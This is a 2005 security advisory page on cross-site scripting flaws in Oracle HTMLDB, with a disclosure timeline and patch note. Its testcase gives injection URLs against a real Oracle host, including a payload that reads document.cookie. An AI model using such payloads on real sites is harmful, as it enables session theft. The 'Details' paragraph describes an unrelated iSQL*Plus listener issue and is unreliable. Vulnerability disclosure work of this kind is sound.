Red-Database-Security GmbH is specialized in Oracle SecurityProductsRepscan 2.5 Hedgehog Enterprise Checkpwd (free)
Services
Information
Company
|
Cross-Site-Scripting Vulnerabilities in Oracle HTMLDB
Details Oracle iSQL*Plus is a web interface to SQL*Plus. The web interface can be used to stop the (unprotected) TNS Listener. Affected Products Oracle Database 9i Release 2 Patch Information This bug is fixed with Critical Patch Update April 2005 (CPU April 2005). Oracle forgot to inform Red-Database-Security that this bug is fixed with CPU April 2005. Oracle also forgot to mention Red-Database-Security in the credits of CPU April 2005. Testcase (displays the current date (sysdate from a select-command) in a javascript message box) http://htmldb.oracle.com/pls/otn/f?p=4500:<script>alert(document.cookie);</script>59:3239664590547916206 http://htmldb.oracle.com/pls/otn/wwv_flow.accept?p_flow_id=4500 &p_flow_step_id=3&p_instance=428576542275032284&p_page_submission_id=3334304&p_request=RUN &p_arg_names=4407099841&p_t01=KORNBRUST&p_arg_names=998876535505& p_t02=select sysdate||'<script>alert("'||sysdate||'");</script>' from dual%3B&p_arg_names=57198154917561018& p_t03=&p_arg_names=50923815163860037&p_t04=&p_arg_names=64882231271599126&p_t05= &p_arg_names=57064518975385648&p_t06=&p_arg_names=57356416829253124&p_t07=&p_arg_names=30322022623394012 &p_t08=&p_arg_names=106590927281022368&p_t09=&p_md5_checksum= History 18-feb-2004 Oracle secalert was informed 19-feb-2004 Bug confirmed 13-apr-2005 Oracle published CPU April 2005 without informing Red-Database-Security that this bug is already fixed. 07-oct-2005 Red-Database-Security published this advisory © 2005 by Red-Database-Security GmbH - last update 03-nov-2005 |
Oracle HTMLDB |